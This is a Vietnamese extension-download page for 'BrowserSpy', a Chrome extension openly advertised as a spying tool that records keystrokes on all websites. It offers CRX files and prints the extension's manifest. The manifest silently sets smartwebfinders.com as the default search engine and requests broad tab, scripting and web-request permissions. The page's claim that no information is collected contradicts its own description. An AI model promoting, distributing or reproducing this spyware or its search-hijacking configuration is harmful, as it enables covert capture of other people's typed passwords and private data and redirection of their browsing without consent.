Top Spying tool : BrowserSpy

BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.

Top Spying tool : BrowserSpy là gì?

Top Spying tool : BrowserSpy là một tiện ích mở rộng Chrome được phát triển bởi tackker, và tính năng chính của nó là "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.".

Ảnh Chụp Màn Hình của Tiện Ích Mở Rộng

screenshot

Tải xuống tệp CRX của tiện ích mở rộng Top Spying tool : BrowserSpy

Tải xuống các tệp mở rộng Top Spying tool : BrowserSpy dưới định dạng crx, cài đặt các tiện ích mở rộng Chrome bằng tay trong trình duyệt hoặc chia sẻ các tệp crx với bạn bè để dễ dàng cài đặt các tiện ích mở rộng Chrome.

Hướng Dẫn Sử Dụng Tiện Ích Mở Rộng

                        BrowserSpy - The Best Spying Tool

BrowserSpy helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

This extension does NOT collect any information
(all logged data stays put)                    

Thông Tin Cơ Bản về Tiện Ích Mở Rộng

Tên Top Spying tool : BrowserSpy Top Spying tool : BrowserSpy
ID cenplbjdopjciamjdjiehflkhfjmklhm
URL Chính Thức https://chromewebstore.google.com/detail/top-spying-tool-browsersp/cenplbjdopjciamjdjiehflkhfjmklhm
Mô tả BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.
Kích Thước Tệp 213 KB
Số Lần Cài Đặt 132
Phiên Bản Hiện Tại 0.9
Cập Nhật Lần Cuối 2024-03-02
Ngày Phát Hành 2021-03-30
Đánh Giá 4.50/5 Tổng số 2 Đánh Giá
Nhà Phát Triển tackker
Email [email protected]
Loại Thanh Toán free
URL Trang Chính Sách Bảo Mật https://tackker.com/privacy-policy
Ngôn Ngữ Được Hỗ Trợ en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Top Spying tool : BrowserSpy",
    "description": "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.",
    "version": "0.9",
    "icons": {
        "128": "browser.png",
        "48": "browser.png",
        "16": "browser.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=60&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    },
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}